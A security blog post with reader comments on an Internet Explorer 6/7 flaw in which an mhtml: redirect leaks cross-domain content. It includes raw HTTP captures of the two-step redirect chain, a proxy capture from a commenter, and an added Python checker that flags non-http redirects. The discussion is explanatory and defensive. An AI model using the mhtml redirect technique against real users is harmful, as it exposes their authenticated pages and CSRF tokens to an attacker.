IE6.0 and IE7.0 Vulnerable to Complete Cross Domain Leakage
This is some of the worst ownage I’ve seen in a long time. Secunia announced a really nasty cross domain leak for Internet Explorer. This allows anyone with control over a webserver to control anything you do with any page you can connect to. It’s interesting that Secunia marked it as a “less critical” threat, as this pretty much gives any attacker read access to any domain anywhere as long as you are using Internet Explorer 6.0 or 7.0.
The only saving grace here is that it does require access to a server where you can write HTTP headers (or somewhere that you can do header injection/redirection), as you need to force the browser to go to a certain URL which then redirects to another URL. Here's what the headers look like:
telnet secunia.com 80
Trying 213.150.41.226...
Connected to secunia.com.
Escape character is '^]'.
GET /ie_redir_test_1/1234 HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 19 Oct 2006 15:38:46 GMT
Server: Apache
Location: mhtml:http://secunia.com/ie_redir_test_2
Connection: close
Content-Type: text/html

telnet secunia.com 80
Trying 213.150.41.226...
Connected to secunia.com.
Escape character is '^]'.
GET /ie_redir_test_2 HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 19 Oct 2006 15:39:00 GMT
Server: Apache
Location: http://news.google.com/
Connection: close
Content-Type: text/html
At this point the client is redirected to the target server as you (with your credentials), and the response is returned as a cacheable mhtml file that can be read via XMLHttpRequest, since it "appears" to your browser to be located on the machine that did the redirection. Pretty clever. I've played around with these sorts of things before but was never successful (obviously I never tried mhtml). It seems to me that someone was saving this one.
And remember the nonces we were using to protect against CSRF? Well, forget it: they're readable via the cross domain leakage now. I don't know why anyone would say this is a less critical risk, as this is complete ownage of the entire internet for users of Internet Explorer. Hopefully Microsoft will patch this one quickly.
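The redirect chain above is easy to spot from the server side of a proxy or from a raw capture: a 302 whose Location header does not use http or https. The following checker is an added example for this post, not Secunia's test code and not something from the original page; the parsing logic and the allow-list of schemes are my own assumptions, and the two sample responses are transcribed from the captures above with the telnet banner and request line removed. It generalizes slightly beyond the post by reporting any non-http(s) redirect scheme rather than only mhtml:.

```python
"""
Flag HTTP redirect responses whose Location header uses a URL scheme other
than http or https (for example mhtml:).  Added example, not code from the
post or from Secunia; the allow-list and parsing are assumptions.
"""
import re
from urllib.parse import urlsplit

# Schemes a redirect is normally expected to use; anything else is reported.
ALLOWED_SCHEMES = {"http", "https"}

# Sample input: the two responses from the post's telnet captures, transcribed
# here without the telnet banner and request line.
SAMPLE_RESPONSES = [
    "HTTP/1.1 302 Found\r\n"
    "Date: Thu, 19 Oct 2006 15:38:46 GMT\r\n"
    "Server: Apache\r\n"
    "Location: mhtml:http://secunia.com/ie_redir_test_2\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "\r\n",
    "HTTP/1.1 302 Found\r\n"
    "Date: Thu, 19 Oct 2006 15:39:00 GMT\r\n"
    "Server: Apache\r\n"
    "Location: http://news.google.com/\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "\r\n",
]


def parse_response_head(raw):
    """Return (status_code, headers) from the head of a raw HTTP response.

    Accepts either CRLF or bare LF line endings (pasted captures often lose
    the CR).  Headers come back as a dict keyed by lower-cased name; the
    first occurrence of a repeated header wins.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    m = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0])
    if not m:
        raise ValueError("not an HTTP response: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), value.strip())
    return int(m.group(1)), headers


def location_scheme(location):
    """Scheme of a Location value, lower-cased, or '' for a relative URL.

    urlsplit() treats a nested value like mhtml:http://... as having the
    outer scheme 'mhtml'; the inner URL is just opaque path text to it.
    """
    return urlsplit(location).scheme.lower()


def check_redirect(raw):
    """Inspect one response; return a finding dict, or None if it is clean."""
    status, headers = parse_response_head(raw)
    if status not in (301, 302, 303, 307) or "location" not in headers:
        return None
    scheme = location_scheme(headers["location"])
    if scheme and scheme not in ALLOWED_SCHEMES:
        return {"status": status, "location": headers["location"], "scheme": scheme}
    return None


def scan(responses):
    """Run check_redirect over a list of captured responses, keeping findings."""
    return [f for f in (check_redirect(r) for r in responses) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_RESPONSES):
        print("suspicious redirect: %(status)s -> %(location)s (scheme %(scheme)s)" % finding)
```

Run against the two captured responses, only the first one is reported (scheme mhtml); the second is an ordinary http redirect. The same check can be dropped into a proxy log review to find redirects on your own servers that were injected through a header-injection bug, which is the precondition the post names for this attack.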
October 19th, 2006 at 8:53 am
[…] Internet Explorer 6 days are a thing of the past. Microsoft announced the final release of Internet Explorer 7 for Windows XP yesterday. I’ve used IE7 since private beta days and I must say, Microsoft has done a smashup job with IE7. Please, please, please… if you’re an Internet Explorer user, go graduate to the next level of safety and security. Update: Looks like IE7 is vulnerable to some pretty amazing XSS trickery. Hat tip, Rsnake. […]
October 19th, 2006 at 10:15 am
and almost 3 weeks till the next Patch Tuesday..
October 19th, 2006 at 10:23 am
[…] Added: Saw this post on ha.ckers.org that says it allows anyone with control over a webserver to control anything you do with any page you can connect to. This is some of the worst ownage I’ve seen in a long time. Secunia announced a really nasty cross domain leak for Internet Explorer. This allows anyone with control over a webserver to control anything you do with any page you can connect to. It’s interesting that Secunia marked it as a “less critical” threat, as this pretty much gives any attacker read access to any domain anywhere as long as you are using Internet Explorer 6.0 or 7.0. […]
October 19th, 2006 at 10:24 am
IE6.0 and IE7.0 Vulnerable to Complete Cross Domain Leakage…
This is some of the worst ownage I've seen in a long time. Secunia announced a really nasty cross domain leak for Internet Explorer. This allows anyone with control over a webserver to control anything you do with any page you can connect to. It's intere…
October 19th, 2006 at 11:55 am
lol… great release… so IE7 will be subject to most of the next patch days
October 19th, 2006 at 12:22 pm
The Secunia exploit didn't work on my IE7 running on Vista with default settings
October 19th, 2006 at 12:36 pm
[…] Upgrading to IE 7 might be a bad idea as at least one person has completely fragged his computer with it (more a Windows Update problem than an IE 7 problem). Oh yeah, and the first IE 7 security vulnerability has already been found (translated to english here, comments here). […]
October 19th, 2006 at 1:28 pm
Worked for my IE6 and IE7 on XP SP2.
And, it looks like this was found back in April.. and never patched..
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2111
http://www.osvdb.org/25073
I guess that giant is only pretending to be asleep
October 20th, 2006 at 3:50 am
IE7 releases with vulnerability (and fun with res…
Open IT Blogwatch in a new tab and read how Microsoft released Internet Explorer 7, but all is not well. Not to mention how to reply to lame resume writers……
October 20th, 2006 at 4:49 am
I managed to do the same attack on my server, news.google.com and many other domains worked, but on some websites it didn’t work. Anyway I would say this is a really serious flaw, it’s something websites cannot protect against.
October 20th, 2006 at 8:35 am
Do you know which sites weren’t vulnerable (a list of 2 or 3 would help)? Perhaps in that knowledge we might be able to figure out how to stop it on the server side.
October 20th, 2006 at 9:35 am
Hrm, I would think it would be able to pull in any site. Just looking at the requests intercepted by Burp proxy.. you can see the final Google request is nothing out of the ordinary:
GET /ie_redir_test_1/?0.6203240305274063 HTTP/1.0
Accept: */*
Accept-Language: en-us
Referer: http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: secunia.com
Cookie: cookies here (spammy)

GET /ie_redir_test_2 HTTP/1.0
Accept: */*
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: secunia.com
Cookie: cookies here

GET / HTTP/1.0
Accept: */*
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Cookie: cookies here
Host: news.google.com
Unless of course, the mhtml chokes on certain characters in the URL.. which would be unusual.
October 20th, 2006 at 9:38 am
I read today that this is actually not a problem in IE but a problem in Outlook Express (some sort of hook into the browser that manifests itself in the browser). Perhaps that has something to do with it? Maybe it’s not super stable as a result.
October 20th, 2006 at 11:42 am
You're right.. completely uninstalling Outlook Express (which is not easy) prevents this from working. Steps to install from XP: http://www.activewin.com/tips/tips/microsoft/winxp/advanced/8.shtml
But.. while in IE7 it caused it to just not work, in IE6 it causes explorer to crash every time. Even when Thunderbird is set as my default email client. Possibly from 'Address Book' still being set as the default - unable to change without a replacement program.
October 20th, 2006 at 12:07 pm
From process of elimination, it's the msoert2.dll. If you use IE7, rename that to msoert2.old and it may be a workaround. Others who try it, let me know if that works for you too. But that still crashes IE6 :/
October 22nd, 2006 at 9:18 am
[…] I know there are quite a few people who read this site but don’t look at the forums, so to save you some time in combing through all the recent posts, I thought I’d highlight a few that were very noteworthy. The first is from Łukasz Pilorz. After doing quite a few tests against the most recent mhtml vulnerability in IE (which turned out to be a problem with interaction between outlook express and the browser) Łukasz found that there is one server side mitigating factor that makes this attack fail - and it’s something as simple as adding a few linebreaks to your code. […]
October 23rd, 2006 at 6:44 am
[…] A blogger at ha.ckers.org contends this bug represents a major security risk (read on for a hard-wired snapshot of the “complete cross-domain leakage” threat) and criticizes Secunia for tagging the threat as merely a 2 on a scale of 1-5. […]